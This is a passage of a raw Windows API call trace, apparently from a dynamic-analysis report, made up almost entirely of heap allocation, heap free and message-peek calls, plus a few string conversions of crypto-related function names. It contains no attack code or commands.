hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0190.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0190.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0190.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0190.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8697) returned 0xbf26b8 [0190.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0190.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0190.588] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0190.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0190.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0190.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0190.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0190.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8697) returned 0xbea018 [0190.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0190.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0190.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0190.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0190.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0190.589] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0190.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0190.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0190.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0190.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0190.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0190.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0190.589] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0190.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0190.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.589] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0190.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0190.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0190.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2778 [0190.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0190.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0190.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0190.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0190.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8697) returned 0xbea018 [0190.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0190.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0190.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0190.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0190.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2748 [0190.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0190.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0190.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0190.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0190.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0190.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0190.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0190.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba078 [0190.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0190.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0190.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0190.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0190.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0190.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8697) returned 0xbfad58 [0190.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0190.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0190.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0190.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0190.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0190.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0190.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0190.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0190.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0190.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0190.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0190.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0190.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0190.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0190.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0190.591] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0190.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0190.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0190.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0190.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0190.591] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0190.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0190.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0190.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0190.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0190.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0190.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0190.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0190.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0190.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0190.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0190.592] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0190.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0190.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0190.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2718 [0190.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0190.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0190.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0190.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0190.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba120 [0190.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0190.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0190.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0190.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0190.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0190.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0190.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0190.593] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0190.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0190.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0190.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0190.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0190.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0190.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0190.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0190.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0190.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0190.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0190.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0190.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0190.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0190.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0190.593] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0190.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0190.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0190.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0190.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0190.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0190.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0190.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0190.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0190.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0190.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0190.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0190.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0190.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0190.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0190.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0190.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0190.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0190.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0190.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0190.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0190.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0190.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0190.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0190.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.594] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0190.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0190.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0190.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0190.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0190.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0190.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0190.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0190.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0190.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0190.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0190.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0190.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0190.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0190.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0190.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0190.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0190.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0190.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0190.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0190.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0190.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0190.595] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0190.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0190.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0190.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0190.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0190.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0190.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0190.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0190.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0190.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0190.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.596] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0190.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba330 [0190.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0190.596] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0190.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0190.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0190.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0190.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0190.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0190.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0190.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0190.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0190.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0190.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0190.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0190.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0190.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0190.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0190.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0190.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0190.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0190.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0190.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0190.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0190.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0190.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0190.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0190.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0190.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0190.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0190.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0190.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0190.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0190.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0190.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0190.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 